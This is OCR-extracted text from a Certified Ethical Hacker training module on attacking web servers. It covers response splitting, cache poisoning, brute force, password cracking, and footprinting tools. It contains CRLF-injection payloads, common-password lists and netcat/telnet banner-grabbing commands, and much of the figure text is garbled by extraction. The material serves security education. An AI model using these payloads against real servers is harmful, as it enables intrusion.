Administrators who configure web servers improperly may leave serious loopholes in the web server, thereby providing an attacker the chance to exploit the misconfigured web server to compromise its security and obtain sensitive information. The vulnerabilities of improperly configured web servers may be related to configuration, applications, files, scripts, or web pages. An attacker searches for such vulnerable web servers to launch attacks. The misconfiguration of a web server provides the attacker a path to enter the target network of an organization. These loopholes in the server can also help an attacker bypass user

Module 13 Page 1791

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Web Servers

Exam 312-50 Certified Ethical Hacker

authentication. Once detected, these problems can be easily exploited and may result in the total compromise of a website hosted on the target web server. As shown in the below figure, the configuration may allow anyone to view the server status page, which contains detailed information about the current use of the web server, including information about the current hosts and requests being processed.

SetHandler

server-status

Figure 13.11: Screenshot displaying the httpd.conf file on an Apache server As shown in the below figure, the configuration may give verbose error messages. display

error

=

On

log_errors = On error_log = syslog ignore_repeated_errors = Off Figure 13.12: Screenshot displaying the php.ini file

Module 13 Page 1792

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures Hacking Web Servers

Exam 312-50 Certified Ethical Hacker

HTTP Response-Splitting Attack |

|

.

HTTP response splitting attack involves adding header

1] response data into the input field so that the server splits the response into two responses

The attacker can control the first response to redirect the

CEH Input = Jason

|

HTTP/1.1200 OK Set-Cookie: author=Jason

Input = JasonTheHacker\r\nHTTP/1.1 200 OK\r\n

user to a malicious website whereas the other responses are discarded by the web browser

First Response (Controlled by Attacker) Set-Cookie: author=JasonTheHacker HTTP/1.1 200 OK

String author = request . getParameter (AUTHOR_PARAM) ; Cookie cookie = new Cookie("author",

Conall

author) ;

cookie. setMaxAge (cookieExpiration) ; response .addCookie (cookie) ;

lied

HTTP/1.1 200 OK Copyright €

HTTP Response-Splitting Attack An HTTP response-splitting attack is a web-based attack in which the attacker tricks the server by injecting new lines into response headers, along with arbitrary code. It involves adding header response data into the input field so that the server splits the response into two responses. This type of attack exploits vulnerabilities in input validation. Cross-site scripting XSS), cross-site request forgery (CSRF), and Structured Query Language (SQL) injection are examples of this type of attack. In this attack, the attacker controls the input parameter and cleverly constructs a request header that elicits two responses from the server. The attacker alters a single request to appear as two requests by adding header response data into the input field. The web server, in turn, responds to each request. The attacker can pass malicious data to a vulnerable application, and the application includes the data in an HTTP response header. The attacker can control the first response to redirect the user to a malicious website, whereas the web browser will discard other responses.

Module 13 Page 1793

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Hacking Web Servers

Input = Jason HTTP/1.1 200 OK

Code

Set-Cookie: author=Jason Input = JasonTheHacker\r\nHTTP/1.1 200 OK\r\n

String author = request .getParameter (AUTHOR_PARAM) ; Cookie

cookie

author)

;

First Response (Controlled by Attacker)

= new Cookie("author",

Set-Cookie: author=JasonTheHacker HTTP/1.1 200 OK

cookie. setMaxAge (cookieExpiration) ; response . addCookie (cookie) ;

‘Second Response HTTP/1.1 200 OK

Figure 13.13: HTTP Response-Splitting attack

Example of an HTTP Response-Splitting Attack In this example, the attacker sends a response-splitting request to the web server. The server splits the response into two and sends the first response to the attacker and the second response to the victim. After receiving the response from the web server, the victim requests service by providing credentials. Simultaneously, the attacker requests for the index page. Subsequently, the web server sends the response to the victim’s request to the attacker, and the victim remains uninformed. Victim

(FE)

Server

Request for service http://www.certifiedhacker.com/account?id=21.

Figure 13.14: Example of an HTTP response-splitting attack

Module 13 Page 1794

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures Hacking Web Servers

Exam 312-50 Certified Ethical Hacker

Web Cache Poisoning Attack @ Web cache poisoning

attacks the reliabilityof an intermediate web cache source

@ In this attack, the

attackers swap cached content for a random URLwith infected content

Users of the web cache source can unknowingly use the poisoned content instead of the true and secured content when requesting the required URL through the web cache

eer hat ‘nap://certfedhnacker.com/Inde. wre Pragma: nocache Host certfeghacker. com ‘Accept Charset so 8859-1, uth-8 GET hep: /ertiedhacker cory redighp ste c0esOscontent Lengih200%0erDessrcooNTT/2. nvLengihs2020%0s%0sContent. ‘ypess20tex/nemoaroanoartecht rmbatack Pagecfnti> MTIP/22.

Address wow-certied hackercom

clearing

Page Original Certified Hacker page ServeriCache

Server

apo. certifedhacker.com/welcome. php? lang= ‘

Normal response after the cache fot certifiedhacker com

‘Attacker sends malicious request that generates two,responses (& and 6)

An attacker forces the webserver'scache to flush its actual cache

cer tp: eertifedhacker.com index. hl HITP/11 Host testste.com User-Agent: Maztla/87 fen], (wien 1) =

Aer carst uo.

88

content and sends a specially crafted request, which

ctuedin cache

rose peseess wwnucerihachercom Atacker'seage

will be

Poisoned Server Cache

Web Cache Poisoning Attack Web

cache

poisoning

damages

the

reliability of an intermediate

web

cache

source.

In this

attack, an attacker swaps cached content for a random URL with infected content. Users of the web cache source may unknowingly use the poisoned content instead of the true and secured content when requesting the required URL through the web cache. An attacker forces the web server’s cache to flush its actual cache content and sends a specially crafted request to store in the cache. In this case, all the users of that web server cache will receive malicious content until the servers flush the web cache. Web cache poisoning attacks are possible if the web server and application have HTTP response-splitting flaws.

Module 13 Page 1795

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Web Servers

Attacker Get http://certifiedhacker.com/index.html HITTP/1.4 Pragma: no-cache Host: certifiedhacker.com :0-8859-1,* utf-8 Accept-Char

GET http://certifiedhacker.com/ redir.php?site=%0d%0aContentLength:%200%0d340a%0d%OaHTTP/1.1 %620200%200K3%0d%0aLast-

Type:%20text/htmI%0d%60a%%Od%0acht mb>Attack Pages/html> HTTP/1.2 Host: certifiedhacker.com

GET http://certifiedhacker.com/index. html HTTP/1.1 Host: testsite.com User-Agent: Mozilla/4.7 [en] (WinNT; 1) 0-8859-1,*,utf-B

Exam 312-50 Certified Ethical Hacker

Address

Page

www.certified hacker.com

Server

— Original Certified Hacker page

Server\Cache Attacker sends request to, remove page from cache

'

Normal response after clearing the cache fot certifiedhacker.com i

Attacker sends malicious request that generates two responses (4 and 6)

attacker's page

www.certifiedhacker.com

hacker.com/welcome.php?

An attacker forces the web server's cache to flush its actual cache content and sends a

Attacker requests certifiedhacker.com to generate cache entry

Address

http://www.

specially crafted request, which will be

stored in cache

Page

Attacker’s page

Poisoned Server Cache

Figure 13.15: Web cache poisoning attack

Module 13 Page 1796

| Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Web Servers

Exam 312-50 Certified Ethical Hacker

SSH Brute Force Attack 4]

| E

c'EH

SSH protocols are used to create an encrypted SSH tunnel between two hosts to transfer unencrypted

data over an insecure network

Attackers can brute force SSH login credentials to gain unauthorized access to an SSH tunnel

|

SSH tunnels can be used to transmit malwares and other exploits to victims without being detected

|

4

Internet

SSHServer

Application Server

> [a

Attacker

File Server

SSH Brute Force Attack Attackers use SSH protocols to create an encrypted SSH tunnel between two hosts to transfer unencrypted data over an insecure network. Usually, SSH runs on TCP port 22. To perform an attack on SSH, an attacker scans the entire SSH server using bots (performs a port scan on TCP port 22) to identify possible vulnerabilities. With the help of a brute-force attack, the attacker obtains login credentials to gain unauthorized access to an SSH tunnel. An attacker who obtains the login credentials of SSH can use the same SSH tunnels to transmit malware and other means of exploitation to victims without being detected. Attackers use tools such as Nmap and Ncrack on a Linux platform to perform an SSH brute-force attack.

Mail Server

7

User

A

e

:

Internet

SSH Server

Web Server

TT TTT > a

ane

Application Server

Attacker

File Server Figure 13.16: SSH Brute Force attack

Module 13 Page 1797

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Web Servers

Exam 312-50 Certified Ethical Hacker

Web Server Password Cracking

clEH

@ An attacker tries to exploit weaknesses to hack well-chosen passwords |@ The most common passwords found are password, root, administrator, admin, demo, test, guest, qwerty, pet names, etc. Attacker mainly targets:

©

SMTP servers

©

SSH Tunnels

@ Web form authentication cracking

© Web shares

@

FTP servers

@ Attackers use different methods such as social engineering, spoofing, phishing, using a Trojan Horse or virus, wiretapping, and keystroke logging @ Attackers usually begin hacking attempts with password cracking to prove to the web server that they are valid users |@ Passwords can be cracked manually by guessing or by performing dictionary, brute force, and hybrid attacks usingautomated tools such as THC Hydra, and Nerack

Web Server Password Cracking An attacker attempts to exploit weaknesses to hack well-chosen passwords. The most common passwords

found

are

password,

root,

administrator,

admin,

demo,

test,

names, and so on. The attacker mainly targets the following through cracking: =

SMTP and FTP servers

=

Web shares

=

SSH tunnels

=

Web form authentication

guest,

web

qwerty,

pet

server password

Attackers use different methods such as social engineering, spoofing, phishing, a Trojan horse or virus, wiretapping, and keystroke logging to perform web server password cracking. In many hacking attempts, the attacker starts with password cracking to prove to the web server that they are a valid user. Web Server Password Cracking Techniques

Password cracking is the most common method of gaining unauthorized access to a web server by exploiting flawed and weak authentication mechanisms. Once the password is cracked, an attacker can use the password to launch further attacks. We present some details of various tools and techniques used by attackers to crack passwords. Attackers can use password cracking techniques to extract passwords from web servers, FTP servers, SMTP servers, and so on. They can crack passwords either manually or with automated tools such as THC Hydra, Ncrack, and RainbowCrack.

Module 13 Page 1798

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Web Servers

Exam 312-50 Certified Ethical Hacker

The following are some techniques attackers use to crack passwords: Guessing: This is the most common method of cracking passwords. In this method, the attacker guesses possible passwords either manually or by using automated tools provided with dictionaries. Most people tend to use their pets’ names, loved ones’ names, license plate numbers, dates of birth, or other weak passwords such as “QWERTY,” “password,” “admin,” etc. so that they can remember them easily. The attacker exploits this human behavior to crack passwords. Dictionary attack: A dictionary attack uses a predefined file containing various combinations of words, and an automated program enters these words one at a time to check if any of them are the password. This might not be effective if the password includes special characters and symbols. If the password is a simple word, then it can be found quickly. Compared to a brute-force attack, a dictionary attack is less timeconsuming. Brute-force attack: In the brute-force method, all possible character combinations are tested; for example, the test may include combinations of uppercase characters from A to Z, numbers from 0 to 9, and lowercase characters from a to z. This method is useful for identifying one-word or two-word passwords. If a password consists of uppercase and lowercase letters as well as special characters, it might take months or years to crack the password using a brute-force attack. Hybrid attack: A hybrid attack is more powerful than the above techniques because it uses both a dictionary attack and brute-force attack. It also uses symbols and numbers. Password cracking is easier with this method than with the above methods.

Module 13 Page 1799

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Web Servers

Exam 312-50 Certified Ethical Hacker

Other Web Server Attacks DoS/DDoS

|

Attacks

CE H

@ Attackers may send numerous fake requests tothe web server, which causes web server crashing or makes it unavailable to the legitimate users

Note: For complete coverage of DoS/DDoS attacks, referto Module 10: Denial-of-Service

'@ Man-in-the-middle/manipulator-in-the-middle (MITM) attacks allowan attacker to access sensitive

Man-in-the-

information by intercepting and altering communications between an end-user and web servers

Middle Attack

Note: For complete coverage of man-in-the-middle (MITM) attacks, refer to Module 11: Session Hijacking

a

|@ The attacker tricks the user to submit login details fora website that looks legitimate, and redirects

Phishing

them to the malicious website hosted on the attacker's web server

Attacks

Note: For complete coverage of phishingattacks, refer to Module 09: Social Engineering

Web

Application

|

@

Bttacks

Vulnerabilities in web applications running on a web server provide a broad attack path for

compromising the web servers

Note: For complete coverage of web application attacks, referto Module 14: Hacking Web Applications

Other Web Server Attacks

DoS/DDoS Attacks A DoS/DDoS attack involves flooding targets with copious fake requests so that the target stops functioning and becomes unavailable to legitimate users. By using a web server DoS/DDoS attack, an attacker attempts to take the web server down or make it unavailable to legitimate users. A web server DoS/DDoS attack often targets high-profile web servers such as bank

servers, credit-card payment gateways, and even root name servers.

Unwanted and malicious traffic takes control over all the available bandwidth

and malicious

ry]

traffic

i

:

Legitimate

user

»

Internet

Successful DDoS attacks can

i i

result in service downtime, financial losses, and permanent business disability

Figure 13.17: Web server DDoS attack

To crash a web server running an application, the attacker targets the following services to consume the web server’s resources with fake requests:

=

Network bandwidth

=

Server memory

=

Application exception handling mechanism

Module 13 Page 1800

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Web Servers =

CPU usage

=

Hard-disk space

=

Database space

Exam 312-50 Certified Ethical Hacker

Note: For complete coverage of DoS/DDoS attacks, refer to Module 10: Denial-of-Service.

Man-in-the-Middle Attack Man-in-the-middle/manipulator-in-the-middle (MITM) attacks allow an attacker to access sensitive information by intercepting and altering communications between an end user and web servers. In an MITM attack or sniffing attack, an intruder intercepts or modifies the messages exchanged between the user and web server by eavesdropping or intruding into a connection. This allows an attacker to steal sensitive user information, such as online banking details, usernames, and passwords, transferred over the Internet to the web server. The attacker lures the victim to connect to the web server by pretending to be a proxy. If the victim believes and accepts the attacker’s request, then all the communication between the user and web server passes through the attacker. In this manner, the attacker can steal sensitive user information.

Attacker sniffs the communication to : steal session IDs :

Attacker Figure 13.18: Man-in-the-middle/sniffing attack

Note: For complete coverage of man-in-the-middle (MITM) attacks, refer to Module 11: Session Hijacking. Phishing Attacks Attackers perform a phishing attack by sending an email containing a malicious link and tricking the user into clicking it. Clicking the link will redirect the user to a fake website that appears similar to the legitimate website. Attackers create such websites by hosting their address on web servers. When a victim clicks on the malicious link while believing the link to be a legitimate website address, the victim is redirected to the malicious website hosted on the attacker’s server. The website prompts the user to enter sensitive information, such as usernames, passwords, bank account details, and social security numbers, and divulges the data to the attacker. Later, the attacker may be able to establish a session with the legitimate website by using the victim’s stolen credentials to perform malicious operations on the target legitimate website.

Module 13 Page 1801

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Web Servers

Request redirects : to malicious web : server

Exam 312-50 Certified Ethical Hacker

Attacker’s web sever

hosting malicious website

Target Web Server Hosting Legitimate

°

Website

impersonate the victim on the

eS

legitimate server

Attacker Figure 13.19: Phishing attacks

Note: For complete coverage of phishing attacks, refer to Module 09: Social Engineering.

Web Application Attacks Even if web servers are configured securely or are secured using network security measures such as firewalls, a poorly coded web application deployed on the web server may provide a path for an attacker to compromise the web server’s security. If web developers do not adopt secure coding practices while developing web applications, attackers may be able to exploit vulnerabilities and compromise web applications and web server security. An attacker can perform different types of attacks on vulnerable web applications to breach web server security. =

Server-Side Request Forgery (SSRF) Attack: Attackers exploit server-side request forgery (SSRF) vulnerabilities, which evolve from the unsafe use of functions in an application, in public web servers to send crafted requests to the internal or backend servers. The backend server believes that the request is made by the web server because they are on the same network and responds with the data stored in it.

=

Parameter/Form Tampering: In this type of tampering attack, the attacker manipulates the parameters exchanged between the client and server to modify application data, such as user credentials and permissions as well as price and quantity of products.

=

Cookie Tampering: Cookie-tampering attacks occur when a cookie is sent from the client side to the server. Different types of tools help in modifying persistent and nonpersistent cookies.

=

Unvalidated Input and File Injection Attacks: Unvalidated input and file-injection attacks are performed by supplying an unvalidated input or by injecting files into a web application.

=

Session Hijacking: Session hijacking is an attack in which the attacker exploits, steals, predicts, and negotiates the real valid web session’s control mechanism to access the authenticated parts of a web application.

Module 13 Page 1802

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Web Servers

Exam 312-50 Certified Ethical Hacker

=

SQL Injection Attacks: SQL injection exploits the security vulnerability of a database for attacks. The attacker injects malicious code into the strings, which are later passed on to the SQL server for execution.

=

Directory Traversal: Directory traversal is the exploitation of HTTP through which attackers can access restricted directories and execute commands outside of the web server's root directory by manipulating a URL.

=

Denial-of-Service (DoS) Attack: A DoS attack is intended to terminate the operations of a website or server to make it unavailable for access by its intended users.

=

Cross-Site Scripting (XSS) Attacks: scripts into a target website.

=

Buffer Overflow Attacks: some amount of data. application may crash or advantage and floods the overflow attack.

=

Cross-Site Request Forgery (CSRF) Attack: An attacker exploits the trust authenticated user to pass malicious code or commands to the web server.

=

Command Injection Attacks: In this type of attack, a hacker alters the content of the web page by using HTML code and by identifying the form fields that lack valid constraints.

=

Source Code Disclosure: Source-code disclosure is a result of typographical scripts or misconfiguration, such as failure to grant executable permissions to a directory. Source-code disclosure can occasionally allow attackers to access information about database credentials and secret keys to compromise the web

Note: For complete Applications.

Module 13 Page 1803

coverage

In this method,

an attacker

injects HTML tags or

The design of most web applications helps them in sustaining If that amount exceeds the storage space available, the exhibit some other vulnerable behavior. An attacker uses this application with an excess amount of data, causing a buffer

of web

application attacks, refer to Module

of

an

errors in script or sensitive server.

14: Hacking Web

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Web Servers

Exam 312-50 Certified Ethical Hacker

ClEH

LO#03: Explain Web Server Attack Methodology

Web Server Attack Methodology

1

clEH

Information Gathering

Web Server Footprinting

Website Mirroring

Vulnerability Scanning

Session Hijacking

Web Server Passwords Hacking

Web Server Attack Methodology The previous section described attacks that can be performed to compromise a web server's security. This section explains how the attacker proceeds toward performing a successful attack on a web server. It also introduces web server hacking tools that attackers may use. These tools extract critical information during the hacking process.

Module 13 Page 1804

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Web Servers

Exam 312-50 Certified Ethical Hacker

A web server attack typically involves preplanned activities called an attack methodology that an attacker follows to reach the goal of breaching the target web server’s security. Attackers hack a web server in multiple stages. At each stage, the attacker attempts to gather information about loopholes and to gain unauthorized access to the web server. The following are the various stages of the attack methodology for web servers. Information Gathering Every attacker tries to collect as much information as possible about the target web server. The attacker gathers the information and then analyzes it to find lapses in the current security mechanisms of the web server. Web Server Footprinting The purpose of footprinting is to gather information about the security aspects of a web server with the help of tools or footprinting techniques. Through footprinting, attackers can determine the web server's remote access capabilities, its ports and services, and other aspects of its security. Website Mirroring Website mirroring is a method of copying a website and its content onto another server for offline browsing. With a mirrored website, an attacker can view the detailed structure of the website. Vulnerability Scanning Vulnerability scanning is a method of finding the vulnerabilities and misconfigurations of a web server. Attackers scan for vulnerabilities with the help of automated tools known as vulnerability scanners. Session Hijacking Attackers can perform session hijacking after identifying the current session of the client. The attacker takes complete control over the user session through session hijacking. Web Server Passwords Hacking Attackers use password-cracking methods such as brute-force attacks, hybrid attacks, and dictionary attacks to crack the web server’s password.

Module 13 Page 1805

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Web Servers

Exam 312-50 Certified Ethical Hacker

Information Gathering

CEH Regtrno "

@ Information gathering involves collecting information about the targeted company

|@ Attackers search the Internet,

newsgroups, bulletin boards, etc.

Name Servers

for information about the company

@ Attackers use tools such as who.is and Whois Lookup and query the Whois databases to get details such as the domain name, IP address, or autonomous system number

Traps ua

Note: For complete coverage of information gathering techniques, referto Module 02: Footprinting and Reconnaissance

Information Gathering Information gathering is the first and one of the most important steps toward hacking a target web server. In this step, an attacker collects as much information as possible about the target server by using various tools and techniques. The information obtained from this step helps the attacker in assessing the security posture of the web server. Attackers may search the Internet, newsgroups, bulletin boards, and so on for gathering information about the target organization. Attackers can use tools such as who.is and Whois Lookup to extract information such as the target’s domain name, IP address, and autonomous system number.

=

who.is Source: https://who.is who.is is designed perform a variety of whois lookup functions. It lets the user perform a domain whois search, whois IP lookup, and whois database search for relevant information on domain registration and availability.

Wiols}

WHOIS Search, Domain Name, Website, and IP Tools

9 Your IP address is

a0-ane

Figure 13.20: Screenshot of who.is

Module 13 Page 1806

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Web Servers

Exam 312-50 Certified Ethical Hacker

Registrar Info

MarkMonitor, Inc.

Name

whois. markmonitor.com httpy//www.markmonitor.com

‘Whois Server

Referral URL

clientDeleteProhibited (nttps:/www.icann.org/epp#clientDeletePronibited) clientTransferProhibited (https://www icann.orglepp#clientTransferPronibited) clientUpdateProhibited (nttps://www.icann.org/epp#clientUpdateProhibited) serverDeleteProhibited (https://www.icann.org/epp#serverDeleteProhibited) serverTransterProhibited (https://www.icann.org/epp#serverTransferProhibited) serverUpdateProhibited (https://www.icann.orglepp#serverUpdateProhibited)

Status

Important Dates

Expires On Registered On

2022-08-02 1995-08-04

Updated On

2021-07-02

Name Servers

dns1 p06 nsone.net dns2_p06.nsone.net dns3.p06.nsone.net dns4.p06.nsone.net ns01.ebaydns.com ns02.ebaydns.com ns03.ebaydns.com ns04.ebaydns.com

198.51.44.6 198.51.45.6 198.51.44.70 198.51.45.70 104,225.38.1 104,225.38.65 104.225.38.129 104,225.38.193

Similar Domains

ebay.ac | ebay.ac.ir | ebay academy | ebay accountants | ebay. adult | ebay ae | ebay.af | ebay.ag | ebay agency | ebay.am | ebay.as | ebay.asia | ebay associates | ebay.at | ebay auction | ebay audio | ebay auto | ebay bar | ebay bargains | ebay.be | Figure 13.21: Screenshot displaying a who.is online search result

The following are some additional information-gathering tools:

=

Whois Lookup (https://whois.domaintools.com)

=

Whois (https://vww.whois.com)

=

Domain Dossier (https://centralops.net)

=

Find Subdomains (https://pentest-tools.com)

=

SmartWhois (https://www.tamos.com)

Note:

For

complete

coverage

of

information-gathering

techniques,

refer

to

Module

02:

Footprinting and Reconnaissance.

Module 13 Page 1807

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures Hacking Web Servers

Exam 312-50 Certified Ethical Hacker

Information Gathering from Robots.txt File

clEH

‘@ The robots.txt file contains the list of the web server directories and files that the web site owner wants to hide from web crawlers

‘@

Anattacker can simply request the Robots.txt

file from the URL and retrieve sensitive

information such as the root directory structure

and content management system information about the target website

‘@

Anattacker can also download the Robots.txt file of a target website using the Wget tool

Information Gathering from Robots.txt File A website owner creates a robots.txt file to list the files or directories a web crawler should index for providing search results. Poorly written robots.txt files can cause the complete indexing

of website

files and

directories.

If confidential

files and

directories

are indexed,

an

attacker may easily obtain information such as passwords, email addresses, hidden links, and membership areas.

If the owner of the target website writes the robots.txt file without allowing the indexing of restricted pages for providing search results, an attacker can still view the robots.txt file of the site to discover restricted files and then view them to gather information.

An attacker types URL/robots.txt in the address bar of a browser to view the target website’s robots.txt file. An attacker can also download the robots.txt file of a target website using the Wget tool.

Module 13 Page 1808

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Hacking Web Servers

BR File

- Notepad “robots.txt Edit

-

°

Eg cl

View

# robots.txt User-agent: Googlebot Disallow:

User-agent:

googlebot-image

User-agent: Disallow:

googlebot-mobile

Disallow: /

User-agent: MSNBot Disallow:

User-agent: Slurp Disallow:/

User-agent: Teoma Disallow:

User-agent:

Gigabot

User-agent:

ia_archiver

User-agent:

baiduspider

User-agent:

naverbot

User-agent:

yeti

User-agent:

yahoo-mmcrawler

User-agent:

psbot

User-agent:

yahoo-blogs/v3.9

User-agent:

*

Disallow:

Disallow:

Disallow:

Disallow:

Disallow: / Disallow: Disallow:

Disallow:/ Disallow:

Crawl-deley: Disallow:

10

/cgi-bin/

Figure 13.22: Screenshot displaying a robots.txt file

Module 13 Page 1809

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Web Servers

Exam 312-50 Certified Ethical Hacker

Web Server Footprinting/Banner Grabbing @

CEH

Gather valuable system-level data such as account

details, operating system, software versions, server names, and database schema details

Netcat

@ This utility reads and writes data across network connections, using the TCP/IP protocol # ne -vv www.microsoft.com 80-press [Enter] GET / HTTP/1.0-Press [Enter] twice Telnet ‘@

This technique probes HTTP servers to determine the

Server field in the HTTP response header

telnet www.moviescope.com 80- press [Enter] GET / HTTP/1.0-Press [Enter] twice Copyright © by

AlRights Reserved. Reproduction f Sty Prohibited

Web Server Footprinting Tools

CE H Netcraft tes:/smwnetrof.com

©

|| 1D Serve

= rll Sever Herfeon Uy foal Sci Freeware by Sve bean Cah ely Gbenectse

x

&

A

=

5

Uniscan

maps:/souceforge.net Nmap

mepsrmeporg Ghost Eye eps://otb.com

ts://wwo. computes ch

© faz

Skipfish ts: google.com copyright © by

Rights Reserved. Reproduction f Sty Prohibited.

Web Server Footprinting/Banner Grabbing By performing web server footprinting, an attacker can gather valuable system-level data such as account details, OSs, software versions, server names, and database schema details. The Telnet utility can be used to footprint a web server and gather information such as server name, server type, OSs, and running applications running. Furthermore, footprinting tools such as ID Serve, httprecon, and Netcraft can be used to perform web server footprinting. These

Module 13 Page 1810

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures Hacking Web Servers

Exam 312-50 Certified Ethical Hacker

footprinting tools can extract information from the target server. Here, we features and types of information these tools can collect from the target server.

examine

the

Web Server Footprinting Tools Netcat

Source: http://netcat.sourceforge.net Netcat is a networking utility that reads and writes data across network connections by using the TCP/IP protocol. It is a reliable “back-end” tool used directly or driven by other programs and scripts. It is also a network debugging and exploration tool. The following are the commands used to perform banner grabbing for www.moviescope.com as an example to gather information such as server type and version. o

# nc

©

GET

-vv /

www. moviescope.com

80 - press [Enter]

HTTP/1.0 - press [Enter] twice

Server identified as Microsoft-

Figure 13.23: Netcat output

Telnet

Source: https://docs.microsoft.com Telnet is a client-server network protocol that is widely used on the Internet or LANs. It provides login sessions for a user on the Internet. A single terminal attached to another computer emulates the session by using Telnet. The primary security issues with Telnet are the following. o.

It does not encrypt data sent through the connection.

o

It lacks an authentication scheme.

Module 13 Page 1811

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures Hacking Web Servers

Exam 312-50 Certified Ethical Hacker

Telnet enables an attacker to perform a banner-grabbing attack. It probes HTTP servers to determine the server field in the HTTP response header. For instance, the following procedure is utilized to enumerate a host running on HTTP

(TCP 80). o

Request Telnet to connect to a host on a specific port with the command # www.moviescope.com 80 and press Enter. A blank screen appears.

oO

TypeGET

/

telnet

HTTP/1.0 and press Enter twice.

The HTTP server responds with the information shown in the screenshot.

Server ident MicrosoftFigure 13.24: Telnet output

=

httprecon

Source: https://www.computec.ch httprecon is a tool for advanced web server fingerprinting. This tool performs bannergrabbing attacks, status code enumeration, and header ordering analysis on the target web server and provides accurate web server fingerprinting information. httprecon performs the following header analysis test cases on the target web server: o

Alegitimate GET request for an existing resource

o

An exceedingly bytes)

o

Acommon

o

Acommon HEAD request for an existing resource

o

Enumeration with OPTIONS, which is allowed

o

The HTTP method DELETE, which is usually not permitted

o

The HTTP method TEST, which is not defined

Module 13 Page 1812

long GET

request

(a Uniform

Resource

Identifier (URI)

of >1024

GET request for a non-existing resource

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures Hacking Web Servers

Exam 312-50 Certified Ethical Hacker

o

The protocol version HTTP/9.8, which does not exist

o

AGET request including attack patterns (e.g., : ../ and %%) -

Hl bttprecon 7.3 - http://www.certifiedhacker.com:80/

file Configuration Fingerprinting Reporting Help Taxoet (Apache 2.046)

o

x

rama

GET exiting | GET long request] GET noreiting| GET wrong protocol HEAD exsing| OPTIONS common | DELETE essing | TEST mehod| Altack Request|

Match (352 Implementations} | Fingepin Detal | Report Preview | [Rane Tits | Match =

N NN. 1} NN. IN. NC IN. NN N IN. IN. NN. IN.

Asache 2046 Apsche 2055 Weroso is 60 Apache 1337 Apache 2058 vache 224 Apache 226 Apoche 1338 Avache 222 Apache 223 Apache 2088, Apache 1326 Apache 1327

100 R10 2 100 9720 7m 9722 7 m 9722 9722 7 9588. 9588 9582. 6 944s 9305 7 S168 &

Ready,

Figure 13.25: Screenshot of httprecon =

ID Serve

Source: https://www.grc.com ID Serve is a simple Internet server identification utility. The following is a list of its capabilities. oO

HTTP Server Identification: ID Serve can identify the make, model, and version of a website’s server software. ID Serve sends this information in the preamble of replies to web queries, but the information is not visible to the user.

o

Non-HTTP Server Identification: Most non-HTTP (non-web) Internet servers (e.g., FTP, SMTP, Post Office Protocol (POP), and NEWS) are required to transmit a line containing a numeric status code and a human-readable greeting to any connecting client. Therefore, ID Serve can also connect with non-web servers to receive and report the server’s greeting message. This generally reveals the server’s make, model, version, and other potentially useful information.

o

Reverse DNS Lookup: When ID Serve users enter a site’s or server’s domain name or URL, the application will use a DNS to determine the IP address of that domain.

Module 13 Page 1813

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Hacking Web Servers

However, it is occasionally useful domain name associated with a DNS lookup, is also built into associated domain name for any

@ |

to proceed in the other direction to determine the known IP address. This process, known as reverse ID Serve. ID Serve attempts to determine the entered IP address.

(DServe

=

Se

| D

Background

Intemet Server Identification Utility, v1.02

Personal Security Freeware by Steve Gibson

rve

Copyright {c) 2003 by Gibson Research Corp.

Server Query

|

Q8A/ Help

x

(

Fy

a

|

Enter or copy / paste an Intemet server URL or IP address here example: www, microsoft.com] : iO

http://www. certifiedhacker.com}

@

Query The Server

hen an Intemet URL or IP has been provided above,

a

cas thas Lutter wa aici s qien of tha specined cover

Server query processing :

B

Vany: Accept-Encoding

